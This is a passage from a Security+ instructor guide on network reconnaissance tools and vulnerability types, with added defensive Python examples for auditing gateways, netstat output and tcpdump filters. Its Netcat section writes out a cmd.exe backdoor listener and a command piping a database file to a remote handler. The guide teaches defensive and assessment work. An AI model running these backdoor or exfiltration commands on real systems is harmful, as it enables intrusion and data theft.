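LINUX_CLEAN = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
10.1.0.254               ether   00:15:5d:aa:bb:01   C                     eth0
10.1.0.99                ether   00:0c:29:12:34:56   C                     eth0
"""

ROUTER_MAC = "00-15-5d-aa-bb-01"   # constructed baseline recorded on a known-good day

if __name__ == "__main__":
    print(check_gateway(WINDOWS_SUSPICIOUS, "10.1.0.254", ROUTER_MAC))
    print(check_gateway(LINUX_CLEAN, "10.1.0.254", ROUTER_MAC))
```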

route and traceroute

Show Slide(s): route and traceroute

The following tools can be used to test the routing configuration and connectivity with
remote hosts and networks.

• route—view and configure the host's local routing table. Most end systems use a
default route to forward all traffic for remote networks via a gateway router. If the
host is not a router, additional entries in the routing table could be suspicious.

Output from the route command on a Linux host. Most endpoints have a simple routing table, similar
to this. It shows the default route (0.0.0.0/0) via the host configured as the default gateway (10.1.0. )
over the network interface eth0. The second line of the table shows the subnet for local traffic
(10.1.0.0/24). This network is directly connected, represented by the 0.0.0.0 gateway.

• tracert—uses ICMP probes to report the round trip time (RTT) for hops between the
local host and a host on a remote network. tracert is the Windows version of
the tool.

• traceroute—performs route discovery from a Linux host. traceroute uses UDP
probes rather than ICMP, by default.

• pathping—provides statistics for latency and packet loss along a route over a
longer measuring period. pathping is a Windows tool; the equivalent on Linux
is mtr.

In a security context, high latency at the default gateway compared to a baseline might
indicate a man-in-the-middle attack. High latency on other hops could be a sign of
denial of service, or could just indicate network congestion.


In Linux, commands such as ifconfig, arp, route, and traceroute are deprecated and
the utilities have not been updated for some years. The iproute2 suite of tools supplies
replacements for these commands
(digitalocean.com/community/tutorials/how-to-use-iproute2-tools-to-manage-network-configuration-on-a-linux-vps).

IP Scanners and Nmap

Show Slide(s): IP Scanners and Nmap

Scanning a network using tools such as ping is time consuming and non-stealthy,
and does not return detailed results. Most topology discovery is performed using
a dedicated IP scanner tool. An IP scanner performs host discovery and identifies
how the hosts are connected together in an internetwork. For auditing, there are
enterprise suites, such as Microsoft's System Center products. Such suites can be
provided with credentials to perform authorized scans and obtain detailed host
information via management protocols, such as the Simple Network Management
Protocol (SNMP).

Teaching Tip: Students shouldn't need detailed knowledge of Nmap switches but make
sure they can distinguish host discovery and service/OS discovery scanning.

The Nmap Security Scanner (nmap.org) is one of the most popular open-source
IP scanners. Nmap can use diverse methods of host discovery, some of which can
operate stealthily and serve to defeat security mechanisms such as firewalls and
intrusion detection. The tool is open-source software with packages for most versions
of Windows, Linux, and macOS. It can be operated with a command line or via a GUI
(Zenmap).

The basic syntax of an Nmap command is to give the IP subnet (or IP host address)
to scan. When used without switches like this, the default behavior of Nmap is to
ping and send a TCP ACK packet to ports 80 and 443 to determine whether a host is
present. On a local network segment, Nmap will also perform ARP and ND (Neighbor
Discovery) sweeps. If a host is detected, Nmap performs a port scan against that host
to determine which services it is running.

Nmap default scan listing open ports from within the default range. (Screenshot Nmap nmap.org.)

This OS fingerprinting can be time-consuming on a large IP scope and is also non-stealthy. If
you want to perform only host discovery, you can use Nmap with the -sn switch (or -sP in
earlier versions) to suppress the port scan.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 39

Show Slides: Service Discovery and Nmap

Service Discovery and Nmap
Having identified active IP hosts on the network and gained an idea of the network
topology, the next step in network reconnaissance is to work out which operating
systems are in use, which network services each host is running, and, if possible,
which application software is underpinning those services. This process is described as
service discovery. Service discovery can also be used defensively, to probe potential
rogue systems and identify the presence of unauthorized network service ports.

Teaching Tip: Remind students that these techniques can be used defensively (auditing)
or offensively (reconnaissance).

Service Discovery with Nmap
When Nmap completes a host discovery scan, it will report on the state of each port
scanned for each IP address in the scope. At this point, you can run additional service
discovery scans against one or more of the active IP addresses. Some of the principal
options for service discovery scans are:
• TCP SYN (-sS)—this is a fast technique also referred to as half-open scanning, as
the scanning host requests a connection without acknowledging it. The target's
response to the scan's SYN packet identifies the port state.

• UDP scans (-sU)—scan UDP ports. As these do not use ACKs, Nmap needs to wait
for a response or timeout to determine the port state, so UDP scanning can take a
long time. A UDP scan can be combined with a TCP scan.

• Port range (-p)—by default, Nmap scans 1000 commonly used ports, as listed in its
configuration file. Use the -p argument to specify a port range.

Service and Version Detection and OS Fingerprinting with Nmap


The detailed analysis of services on a particular host is often called fingerprinting. This
is because each OS or application software that underpins a network service responds
to probes in a unique way. This allows the scanning software to guess at the software
name and version, without having any sort of privileged access to the host. This can
also be described as banner grabbing, where the banner is the header of the response
returned by the application.
When services are discovered, you can use Nmap with the -sV or -A switch to probe
a host more intensively to discover the following information:
• Protocol—do not assume that a port is being used for its "well known" application
protocol. Nmap can scan traffic to verify whether it matches the expected signature
(HTTP, DNS, SMTP, and so on).

• Application name and version—the software operating the port, such as Apache
web server or Internet Information Services (IIS) web server.

• OS type and version—use the -O switch to enable OS fingerprinting or -A to use
both fingerprinting and version discovery.

• Device type—not all network devices are PCs. Nmap can identify switches and
routers or other types of networked devices, such as NAS boxes, printers, and
webcams.

Nmap fingerprinting scan results. (Screenshot Nmap nmap.org.)

Nmap comes with a database of application and version fingerprint signatures,
classified using a standard syntax called Common Platform Enumeration (CPE).
Unmatched responses can be submitted to a web URL for analysis by the community.

Show Slides: netstat and nslookup

netstat and nslookup
Basic service discovery tasks can also be performed using tools built into the Windows
and Linux operating systems:
• netstat—show the state of TCP/UDP ports on the local machine. The same
command is used on both Windows and Linux, though with different options syntax.
You can use netstat to check for service misconfigurations (perhaps a host is
running a web or FTP server that a user installed without authorization). You may
also be able to identify suspect remote connections to services on the local host or
from the host to remote IP addresses. If you are attempting to identify malware, the
most useful netstat output is to show which process is listening on which ports.

Teaching Tip: Hopefully students will be familiar with the basic operation of these
tools from Network+.

netstat command running on Windows showing activity during an nmap scan. The findstr function
is being used to filter the output (to show only connections from IPv4 hosts on the same subnet).
(Screenshot used with permission from Microsoft.)

On Linux, use of netstat is deprecated in favor of the ss command from the iptools suite
(linux.com/topic/networking/introduction-ss-command).

• nslookup/dig—query name records for a given domain using a particular DNS
resolver under Windows (nslookup) or Linux (dig). An attacker may test a
network to find out if the DNS service is misconfigured. A misconfigured DNS may
allow a zone transfer, which will give the attacker the complete records of every host
in the domain, revealing a huge amount about the way the network is configured.

Testing whether the name server for comptia.org will allow a zone transfer.
(Screenshot used with permission from Microsoft.)
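As an added example (not taken from the guide), the following Python script parses the text that `netstat -ano` prints on Windows and reports which process owns which listening port, which listeners fall outside an expected baseline, and which established connections go to hosts on a given subnet (the same view the findstr filter in the screenshot produces). The netstat text and the baseline set are constructed assumptions.

```python
"""Audit listening ports and peer connections from Windows `netstat -ano` output.

Added example, not from the CompTIA guide. The sample output below is constructed;
feed the text of a real `netstat -ano` run to audit() to check an actual host.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample of `netstat -ano` output (not a real capture). The listener
# on TCP 666 owned by PID 4120 stands in for the Netcat backdoor from the lesson.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:666            0.0.0.0:0              LISTENING       4120
  TCP    10.1.0.1:139           0.0.0.0:0              LISTENING       4
  TCP    10.1.0.1:49700         10.1.0.192:6666        ESTABLISHED     4120
  TCP    10.1.0.1:49711         203.0.113.9:443        ESTABLISHED     5100
  UDP    0.0.0.0:123            *:*                                    1324
"""

# Hypothetical baseline of the listeners expected on this host.
BASELINE: Set[Tuple[str, int]] = {("TCP", 135), ("TCP", 139), ("TCP", 445), ("UDP", 123)}


@dataclass
class Socket:
    proto: str                  # "TCP" or "UDP"
    local_ip: str
    local_port: int
    remote_ip: Optional[str]    # None for the UDP wildcard "*:*"
    remote_port: Optional[int]
    state: str                  # LISTENING, ESTABLISHED, ...; "" on UDP rows
    pid: int


def _split_endpoint(text: str) -> Tuple[Optional[str], Optional[int]]:
    """Split 'ip:port' or '[ipv6]:port' into (ip, port); '*:*' gives (None, None)."""
    if text == "*:*":
        return None, None
    host, _, port = text.rpartition(":")
    return host.strip("[]"), int(port)


def parse_netstat(text: str) -> List[Socket]:
    """Turn the rows of `netstat -ano` into Socket records, skipping the header."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        # TCP rows have five columns; UDP rows lack the State column, so the
        # PID is always the last field and the state is empty for UDP.
        state = parts[3] if len(parts) == 5 else ""
        lip, lport = _split_endpoint(parts[1])
        rip, rport = _split_endpoint(parts[2])
        sockets.append(Socket(parts[0], lip, lport, rip, rport, state, int(parts[-1])))
    return sockets


def listeners(sockets: List[Socket]) -> Dict[Tuple[str, int], int]:
    """Map (proto, port) to the owning PID: the 'which process is on which port'
    view that the lesson calls the most useful netstat output for malware hunting."""
    return {(s.proto, s.local_port): s.pid
            for s in sockets if s.state == "LISTENING" or s.proto == "UDP"}


def unexpected_listeners(sockets: List[Socket], baseline: Set[Tuple[str, int]]):
    """Listeners whose (proto, port) is not in the approved baseline."""
    return {key: pid for key, pid in listeners(sockets).items() if key not in baseline}


def connections_from(sockets: List[Socket], subnet: str) -> List[Socket]:
    """Established TCP connections whose peer lies inside `subnet`, the same
    view the findstr filter in the screenshot produces for same-subnet hosts."""
    net = ipaddress.ip_network(subnet)
    return [s for s in sockets if s.state == "ESTABLISHED" and s.remote_ip is not None
            and ipaddress.ip_address(s.remote_ip) in net]


def audit(text: str, baseline: Set[Tuple[str, int]], subnet: str) -> Dict[str, object]:
    """Run all three checks over one netstat listing and return them as a report."""
    sockets = parse_netstat(text)
    return {
        "listeners": listeners(sockets),
        "unexpected": unexpected_listeners(sockets, baseline),
        "same_subnet": [(s.remote_ip, s.remote_port, s.pid)
                        for s in connections_from(sockets, subnet)],
    }


if __name__ == "__main__":
    report = audit(SAMPLE_NETSTAT, BASELINE, "10.1.0.0/24")
    for (proto, port), pid in report["unexpected"].items():
        print(f"unexpected listener {proto}/{port} owned by PID {pid}")
    for ip, port, pid in report["same_subnet"]:
        print(f"PID {pid} has a connection to {ip}:{port} on the local subnet")
```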

Show Slides: Other Reconnaissance and Discovery Tools

Other Reconnaissance and Discovery Tools
There are hundreds of tools relevant to security assessments, network reconnaissance,
vulnerability scanning, and penetration testing. Security distributions specialize in
bundling these tools for Linux—notably KALI (kali.org) plus ParrotOS (parrotlinux.org)—
and Windows (fireeye.com/blog/threat-research/2019/03/commando-vm-windows-
offensive-distribution.html).

Teaching Tip: There is only space for brief overviews of these tools, though we will be
examining vulnerability scanners in more detail later in the lesson.

theHarvester
theHarvester is a tool for gathering open-source intelligence (OSINT) for a particular
domain or company name (github.com/laramies/theHarvester). It works by scanning
multiple public data sources to gather emails, names, subdomains, IPs, URLs, and other
relevant data.

dnsenum
While you can use tools such as dig and whois to query name records and hosting
details and to check that external DNS services are not leaking too much information,
a tool such as dnsenum packages a number of tests into a single query (github.com/
fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can
try to work out the IP address ranges that are in use.

scanless
Port scanning is difficult to conceal from detection systems, unless it is performed
slowly and results gathered over an extended period. Another option is to disguise the
source of probes. To that end, scanless is a tool that uses third-party sites (github.com/
vesche/scanless). This sort of tool is also useful in a defensive sense, by scanning for
ports and services that are open but shouldn't be.

curl
curl is a command-line client for performing data transfers over many types of
protocol (curl.haxx.se). This tool can be used to submit HTTP GET, POST, and PUT
requests as part of web application vulnerability testing. curl supports many other
data transfer protocols, including FTP, IMAP, LDAP, POP3, SMB, and SMTP.

Nessus
The list of services and version information that a host is running can be cross-
checked against lists of known software vulnerabilities. This type of scanning is
usually performed using automated tools. Nessus, produced by Tenable Network
Security (tenable.com/products/nessus/nessus-professional), is one of the best-known
commercial vulnerability scanners. It is available in on-premises (Nessus Manager)
and cloud (Tenable Cloud) versions, as well as a Nessus Professional version, designed
for smaller networks. The product is free to use for home users but paid for on a
subscription basis for enterprises. As a previously open-source program, Nessus also
supplies the source code for many other scanners.

Show Slides: Packet Capture and tcpdump

Packet Capture and tcpdump
Packet and protocol analysis is another crucial security assessment and monitoring
process:
• Packet analysis refers to deep-down frame-by-frame scrutiny of captured frames.

• Protocol analysis means using statistical tools to analyze a sequence of packets, or
packet trace.

Packet and protocol analysis depends on a sniffer tool to capture and decode the
frames of data. Network traffic can be captured from a host or from a network
segment. Using a host means that only traffic directed at that host is captured.
Capturing from a network segment can be performed by a switched port analyzer
(SPAN) port or mirror port. This means that a network switch is configured to copy
frames passing over designated source ports to a destination port, which the packet
sniffer is connected to. Sniffing can also be performed over a network cable segment
by using a test access port (TAP). This means that a device is inserted in the cabling to
copy frames passing over it. There are passive and active (powered) versions.

Typically, sniffers are placed inside a firewall or close to a server of particular
importance. The idea is usually to identify malicious traffic that has managed to
get past the firewall. A single sniffer can generate an exceptionally large amount of
data, so you cannot just put multiple sensors everywhere in the network without
provisioning the resources to manage them properly. Depending on network size and
resources, one or just a few sensors will be deployed to monitor key assets or network
paths.

Teaching Tip: Make sure students understand what information can be gathered
depending on where the host/sensor running the tool is placed in the network. Note that
network monitoring is both a threat (snooping) and a security measure (snooping on the
snoopers).

tcpdump is a command-line packet capture utility for Linux (linux.die.net/man/8/
tcpdump). The basic syntax of the command is tcpdump -i eth0, where
eth0 is the interface to listen on. The utility will then display captured packets until
halted manually (Ctrl+C). Frames can be saved to a .pcap file using the -w option.
Alternatively, you can open a pcap file using the -r option.
tcpdump is often used with some sort of filter expression to reduce the number of
frames that are captured:
• Type—filter by host, net, port, or portrange.

• Direction—filter by source (src) or destination (dst) parameters (host,
network, or port).

• Protocol—filter by a named protocol rather than port number (for example, arp,
icmp, ip, ip6, tcp, udp, and so on).

Filter expressions can be combined by using Boolean operators:
• and (&&)

• or (||)

• not (!)

Filter syntax can be made even more detailed by using parentheses to group
expressions. A complex filter expression should be enclosed by quotes. For example,
the following command filters frames to those with the source IP 10.1.0.100 and
destination port 53 or 80:
tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"
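The filter grammar just described, as an added Python example (not from the guide and not tcpdump's own code): a small parser and evaluator for the host/net/port/portrange primitives, the src/dst qualifiers, protocol names, and/or/not (also &&, ||, !) and parentheses, run over constructed frame records, including the exact expression used in the command above. It assumes the net primitive is given in CIDR notation and does not model ip6.

```python
"""tcpdump-style filter evaluator over constructed frames (added example, see lead-in)."""
import ipaddress
import re
from collections import namedtuple

PROTOCOLS = {"arp", "icmp", "ip", "tcp", "udp"}
TOKEN_RE = re.compile(r"\(|\)|&&|\|\||!|[^\s()!]+")  # parens, operators, words
# proto is "tcp", "udp", "icmp" or "arp"; only TCP/UDP frames carry ports.
Frame = namedtuple("Frame", "proto src dst sport dport", defaults=(None, None))

class FilterParser:
    """Recursive descent: 'not' binds tightest, then 'and', then 'or', as in tcpdump."""
    def __init__(self, expr):
        self.toks, self.pos = TOKEN_RE.findall(expr), 0

    def _peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else None

    def _take(self):
        if self.pos >= len(self.toks):
            raise ValueError("unexpected end of filter expression")
        self.pos += 1
        return self.toks[self.pos - 1]

    def parse(self):
        node = self._or()
        if self._peek() is not None:
            raise ValueError(f"unexpected token {self._peek()!r}")
        return node

    def _or(self):
        return self._binary(("or", "||"), lambda: self._binary(("and", "&&"), self._not))

    def _binary(self, ops, operand):  # left-associative chain; ops[0] names the node
        node = operand()
        while self._peek() in ops:
            self._take()
            node = (ops[0], node, operand())
        return node

    def _not(self):
        if self._peek() in ("not", "!"):
            self._take()
            return ("not", self._not())
        return self._primary()

    def _primary(self):
        tok = self._take()
        if tok == "(":
            node = self._or()
            if self._take() != ")":
                raise ValueError("missing ')'")
            return node
        direction = None
        if tok in ("src", "dst"):  # optional direction qualifier
            direction, tok = tok, self._take()
        if tok in ("host", "net", "port", "portrange"):
            return ("prim", direction, tok, self._take())
        if tok in PROTOCOLS and direction is None:
            return ("proto", tok)
        raise ValueError(f"bad primitive {tok!r}")

def _end_matches(kind, value, addr, port):  # one end of a frame vs host/net/port/portrange
    if kind == "host":
        return addr == value
    if kind == "net":  # CIDR form assumed, e.g. 10.1.0.0/24
        return ipaddress.ip_address(addr) in ipaddress.ip_network(value, strict=False)
    if kind == "port":
        return port == int(value)
    lo, hi = (int(x) for x in value.split("-"))  # portrange lo-hi
    return port is not None and lo <= port <= hi

def matches(node, frame):
    op = node[0]
    if op in ("or", "and"):
        left, right = matches(node[1], frame), matches(node[2], frame)
        return (left or right) if op == "or" else (left and right)
    if op == "not":
        return not matches(node[1], frame)
    if op == "proto":  # 'ip' selects every non-ARP frame
        return frame.proto == node[1] or (node[1] == "ip" and frame.proto != "arp")
    direction, kind, value = node[1:]
    src_ok = _end_matches(kind, value, frame.src, frame.sport)
    dst_ok = _end_matches(kind, value, frame.dst, frame.dport)
    return {"src": src_ok, "dst": dst_ok}.get(direction, src_ok or dst_ok)  # unqualified: either end

def apply_filter(expr, frames):
    """Indices of the frames selected by the filter expression."""
    tree = FilterParser(expr).parse()
    return [i for i, f in enumerate(frames) if matches(tree, f)]

SAMPLE_FRAMES = [  # constructed frames, not a real capture
    Frame("tcp", "10.1.0.100", "10.1.0.1", 51000, 80),
    Frame("udp", "10.1.0.100", "10.1.0.53", 51001, 53),
    Frame("tcp", "10.1.0.100", "203.0.113.9", 51002, 443),
    Frame("tcp", "10.1.0.7", "10.1.0.100", 51003, 80),
    Frame("icmp", "10.1.0.7", "10.1.0.100"),
    Frame("arp", "10.1.0.1", "10.1.0.100"),
]
```

Running `apply_filter("src host 10.1.0.100 and (dst port 53 or dst port 80)", SAMPLE_FRAMES)` returns the indices of the first two frames, which is what the tcpdump command above would keep.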

Show Slides: Packet Analysis and Wireshark

Packet Analysis and Wireshark
A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to perform
traffic analysis. You can either analyze a live capture or open a saved capture (.pcap)
file. Protocol analyzers can decode a captured frame to reveal its contents in a readable
format. You can choose to view a summary of the frame or choose a more detailed
view that provides information on the OSI layer, protocol, function, and data.

Teaching Tip: Students should get as much practice using Wireshark as possible.

Wireshark (wireshark.org) is an open-source graphical packet capture and analysis
utility, with installer packages for most operating systems. Having chosen the interface
to listen on, the output is displayed in a three-pane view. The packet list pane shows a
scrolling summary of frames. The packet details pane shows expandable fields in the
frame currently selected from the packet list. The packet bytes pane shows the raw
data from the frame in hex and ASCII. Wireshark is capable of parsing (interpreting) the
headers and payloads of hundreds of network protocols.
You can apply a capture filter using the same expression syntax as tcpdump (though
the expression can be built via the GUI tools too). You can save the output to a .pcap
file or load a file for analysis. Wireshark supports very powerful display filters (wiki.
wireshark.org/DisplayFilters) that can be applied to a live capture or to a capture file.
You can also adjust the coloring rules (wiki.wireshark.org/ColoringRules), which control
the row shading and font color for each frame.

Wireshark protocol analyzer. (Screenshot used with permission from wireshark.org.)

Another useful option is to use the Follow TCP Stream context command to
reconstruct the packet contents for a TCP session.

The PCAP file format has some limitations, which has led to the development of PCAP Next
Generation (PCAPNG). Wireshark now uses PCAPNG by default, and tcpdump can process
files in the new format too (cloudshark.io/articles/5-reasons-to-move-to-pcapng).

Show Slides: Packet Injection and Replay

Packet Injection and Replay
Some reconnaissance techniques and tests depend on sending forged or spoofed
network traffic. Often, network sniffing software libraries allow frames to be inserted
or injected into the network stream. There are also tools that allow for different kinds
of packets to be crafted and manipulated. Well-known tools used for packet injection
include Dsniff (monkey.org/~dugsong/dsniff), Ettercap (ettercap-project.org), Scapy
(scapy.net), and hping (hping.org).

hping
hping is an open source spoofing tool that provides a penetration tester with the
ability to craft network packets to exploit vulnerable firewalls and IDSs. hping can
perform the following types of test:
• Host/port detection and firewall testing—like Nmap, hping can be used to probe
IP addresses and TCP/UDP ports for responses.

• Traceroute—if ICMP is blocked on a local network, hping offers alternative ways
of mapping out network routes. hping can use arbitrary packet formats, such as
probing DNS ports using TCP or UDP, to perform traces.

• Denial of service (DoS)—hping can be used to perform flood-based DoS attacks
from randomized source IPs. This can be used in a test environment to determine
how well a firewall, IDS, or load balancer responds to such attacks.

tcpreplay
As the name suggests, tcpreplay takes previously captured traffic that has been saved
to a .pcap file and replays it through a network interface (linux.die.net/man/1/tcpreplay).
Optionally, fields in the capture can be changed, such as substituting MAC or IP
addresses. tcpreplay is useful for analysis purposes. If you have captured suspect
traffic, you can replay it through a monitored network interface to test intrusion
detection rules.

Show Slides: Exploitation Frameworks

Exploitation Frameworks
A remote access trojan (RAT) is malware that gives an adversary the means of
remotely accessing the network. From the perspective of security posture assessment,
a penetration tester might want to try to establish this sort of connection and attempt
to send corporate information over the channel (data exfiltration). If security controls
are working properly, this attempt should be defeated (or at least detected).

Teaching Tip: These are complex products, so just focus on the basic uses.

An exploitation framework uses the vulnerabilities identified by an automated
scanner and launches scripts or software to attempt to deliver matching exploits. This
might involve considerable disruption to the target, including service failure, and risk
data security.
The framework comprises a database of exploit code, each targeting a particular
CVE (Common Vulnerabilities and Exposures). The exploit code can be coupled with
modular payloads. Depending on the access obtained via the exploit, the payload code
may be used to open a command shell, create a user, install software, and so on. The
custom exploit module can then be injected into the target system. The framework
may also be able to obfuscate the code so that it can be injected past an intrusion
detection system or anti-virus software.
The best-known exploit framework is Metasploit (metasploit.com). The platform
is open-source software, now maintained by Rapid7. There is a free framework
(command-line) community edition with installation packages for Linux and Windows.
Rapid7 produces pro and express commercial editions of the framework and it can be
closely integrated with the Nexpose vulnerability scanner.

Metasploit Framework Console. (Screenshot used with permission from metasploit.com.)

Sn1per (github.com/1N3/Sn1per) is a framework designed for penetration test
reporting and evidence gathering. It can integrate with other tools such as Metasploit
and Nikto to run automated suites of tests. Results can be displayed as web reports.
There are many other exploitation frameworks targeting different kinds of
vulnerabilities. Some examples include:
• fireELF—injecting fileless exploit payloads into a Linux host (github.com/rek7/
fireELF).

• RouterSploit—vulnerability scanning and exploit modules targeting embedded
systems (github.com/threat9/routersploit).

• Browser Exploitation Framework (BeEF)—recovering web session information and
exploiting client-side scripting (beefproject.com).

• Zed Attack Proxy (ZAP)—scanning tools and scripts for web application and mobile
app security testing (owasp.org/www-project-zap).

• Pacu—scanning and exploit tools for reconnaissance and exploitation of Amazon
Web Service (AWS) accounts (rhinosecuritylabs.com/aws/pacu-open-source-aws-
exploitation-framework).

Show Slides: Netcat

Netcat
One simple but effective tool for testing connectivity is Netcat (nc), available for both
Windows and Linux. Netcat can be used for port scanning and fingerprinting. For
example, the following command attempts to connect to the HTTP port on a server and
return any banner by sending the "head" HTTP keyword:
echo "head" | nc 10.1.0.1 -v 80

Teaching Tip: Note that there are several versions of Netcat, including OpenBSD Netcat
and Nmap's ncat (nmap.org/ncat).

Netcat can also establish connections with remote machines. To configure Netcat as a
backdoor, you first set up a listener on the victim system (IP 10.1.0.1) set to pipe traffic
from a program, such as the command interpreter, to its handler:
nc -l -p 666 -e cmd.exe

The following command connects to the listener and grants access to the terminal:
nc 10.1.0.1 666
Used the other way around, Netcat can be used to receive files. For example, on the
target system the attacker runs the following:
type accounts.sql | nc 10.1.0.192 6666
On the handler (IP 10.1.0.192), the attacker receives the file using the following
command:
nc -l -p 6666 > accounts.sql

Review Activity:
Organizational Security with Network
Reconnaissance Tools
Answer the following questions:

1. You suspect that a rogue host is acting as the default gateway for a subnet
in a spoofing attack. What command line tool(s) can you use from a
Windows client PC in the same subnet to check the interface properties of
the default gateway?

Use ipconfig to check the IP addresses of the default gateway and the DHCP server. Use
arp to check the MAC addresses associated with those IP addresses and investigate
possible spoofing. You could also use the route command to verify the properties of
the default route.

2. You suspect the rogue host is modifying traffic before forwarding it, with
the side effect of increasing network latency. Which tool could you use to
measure latency on traffic routed from this subnet?

From a Windows host, the pathping tool can be used to measure latency along a route.

3. What type of tool could you use to fingerprint the host acting as the default
gateway?

This requires a tool that performs fingerprinting (service and version detection) by
examining responses to network probes and comparing them to known responses
from common platforms. Nmap is very widely used for this task, or you could use
hping or Netcat.

4. You are investigating a Linux server that is the source of suspicious network
traffic. At a terminal on the server, which tool could you use to check which
process is using a given TCP port?

You can use the netstat command to do this.

5. What is a zone transfer and which reconnaissance tools can be used to test
whether a server will allow one?

A zone transfer is where a domain name server (DNS) allows a client to request all the
name records for a domain. nslookup (Windows) and dig (principally Linux) can be used
to test whether this query is allowed. You could also mention the dnsenum tool, which
will check for zone transfers along with other enumeration tests on DNS infrastructure.

6. What type of organizational security assessment is performed using Nessus?

Nessus is an automated network vulnerability scanner that checks for software
vulnerabilities and missing patches.

7. You are developing new detection rules for a network security scanner.
Which tool will be of use in testing whether the rules match a malicious
traffic sample successfully?

The tcpreplay tool can be used to stream captured traffic from a file to a monitored
network interface.

8. What security posture assessment could a pen tester make using Netcat?

Whether it is possible to open a network connection to a remote host over a given port.

Topic 3B
Explain Security Concerns with General
Vulnerability Types

EXAM OBJECTIVES COVERED
1.6 Explain the security concerns associated with various types of vulnerabilities

Teaching Tip: This objective covers a broad range of vulnerability types and contains
some new areas of focus for the exam update, so be prepared to allocate plenty of time
to this topic.

Performing a security assessment effectively is not simply a matter of choosing
the appropriate tools. You need to understand the types of vulnerabilities that affect
information systems and networks. You must also be able to evaluate and explain
the impacts that can arise from vulnerabilities, so that assessment and remediation
activities can be given priority where they are most needed.

Show Slides: Software Vulnerabilities and Patch Management

Software Vulnerabilities and Patch Management
Software exploitation means an attack that targets a vulnerability in software code.
An application vulnerability is a design flaw that can cause the security system to
be circumvented or that will cause the application to crash. Typically, vulnerabilities
can only be exploited in quite specific circumstances, but because of the complexity
of modern software and the speed with which new versions must be released to
market, almost no software is free from vulnerabilities. As two contrasting examples,
consider vulnerabilities affecting Adobe's PDF document reader versus a vulnerability
in the server software underpinning transport security. The former could give a threat
actor a foothold on a corporate network via a workstation; the latter could expose
the cryptographic keys used to provide secure web services to compromise. Both are
potentially high impact for different reasons.

Teaching Tip: Students should be familiar with the concept of software vulnerabilities,
but check that they understand the range of code and device types that these affect.

It is also important to realize that software vulnerabilities affect all types of code, not
just applications:
• Operating system (OS)—an application exploit will run with the permissions of the
logged on user, which will hopefully be limited. A vulnerability in a kernel file or
shared library is more likely to allow privilege escalation, where the malware code
runs with higher access rights (system or root). Dirty COW is one example of a Linux
kernel vulnerability (access.redhat.com/blogs/766093/posts/2757141).

• Firmware—vulnerabilities can exist in the BIOS/UEFI firmware that controls the boot
process for PCs. There can also be bugs in device firmware, such as network cards
and disk controllers. Finally, network appliances and Internet of Things (IoT) devices
run code as a type of firmware. Like kernel vulnerabilities, firmware exploits
can be difficult to identify, because the exploit code can run with the highest
level of privilege. The Intel AMT vulnerability illustrates the impacts of a firmware
vulnerability (blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-
Stealth-Breakthrough-wp.pdf).

Most vulnerabilities are discovered by software and security researchers, who notify
the vendor to give them time to patch the vulnerability before releasing details
to the wider public. Improper or weak patch management is an additional layer
of vulnerability where these security patches are not applied to systems, leaving
them vulnerable to exploits. Poor configuration management may mean that the
organization is simply not documenting and managing its assets rigorously. Patches
may be deployed to some systems, but not others. Patches may be applied and then
removed because they cause performance issues.

Show Slides: Zero-Day and Legacy Platform Vulnerabilities

Zero-Day and Legacy Platform Vulnerabilities
Even if effective patch management procedures are in place, attackers may still be
able to use software vulnerabilities as an attack vector. A vulnerability that is exploited
before the developer knows about it or can release a patch is called a zero-day. These
can be extremely destructive, as it can take the vendor some time to develop a patch,
leaving systems vulnerable in the interim.

The term zero-day is usually applied to the vulnerability itself but can also refer to an attack
or malware that exploits it. The EternalBlue zero-day exploit makes for an instructive case
study (wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world).

Zero-day vulnerabilities have significant financial value. A zero-day exploit for a mobile
OS can be worth millions of dollars. Consequently, an adversary will only use a zero-
day vulnerability for high value attacks. State security and law enforcement agencies
are known to stockpile zero-days to facilitate the investigation of crimes.
A legacy platform is one that is no longer supported with security patches by its
developer or vendor. This could be a PC/laptop/smartphone, networking appliance,
peripheral device, Internet of Things device, operating system, database/programming
environment, or software application. By definition, legacy platforms are unpatchable.
Such systems are highly likely to be vulnerable to exploits and must be protected
by security controls other than patching, such as isolating them to networks that an
attacker cannot physically connect to.

Show Slides: Weak Host Configurations

Weak Host Configurations
While ineffective patch and configuration management policies and procedures
represent one type of vulnerability, weak configurations can have similar impacts.

Teaching Tip: Focus discussion on the impact of these vulnerabilities. We will be looking
at hardening and other mitigation techniques later in the course.

Default Settings
Relying on the manufacturer default settings when deploying an appliance or software
applications is one example of weak configuration. It is not sufficient to rely on the
vendor to ship products in a default secure configuration, though many now do.
Default settings may leave unsecure interfaces enabled that allow an attacker to
compromise the device. Network appliances with weak settings can allow attackers to
move through the network unhindered and snoop on traffic.

Unsecured Root Accounts
The root account, referred to as the default Administrator account in Windows or
generically as the superuser, has no restrictions set over system access. A superuser
account is used to install the OS. An unsecured root account is one that an adversary is
able to gain control of, either by guessing a weak password or by using some local boot
attack to set or change the password. Software bugs can also allow root access, such
as one affecting macOS (arstechnica.com/information-technology/2017/11/macos-
bug-lets-you-log-in-as-admin-with-no-password-required). These vulnerabilities are
extremely serious as they give the threat actor complete control of the system.
Effective user management and authorization policies should be enforced so that the
superuser account is highly restricted and administration tasks are performed by least
privilege management accounts or roles instead. The default root or Administrator
account is usually disabled for login. Even if this type of account is enabled for local
(interactive) login, it should not be accessible via remote login mechanisms.

Open Permissions
Open permissions refers to provisioning data files or applications without
differentiating access rights for user groups. Permissions systems can be complex
and it is easy to make mistakes, such as permitting unauthenticated guests to view
confidential data files, or allowing write access when only read access is appropriate.
This issue is particularly prevalent on cloud storage, where administrators used to
Windows and Linux directory access control lists may be unfamiliar with the cloud
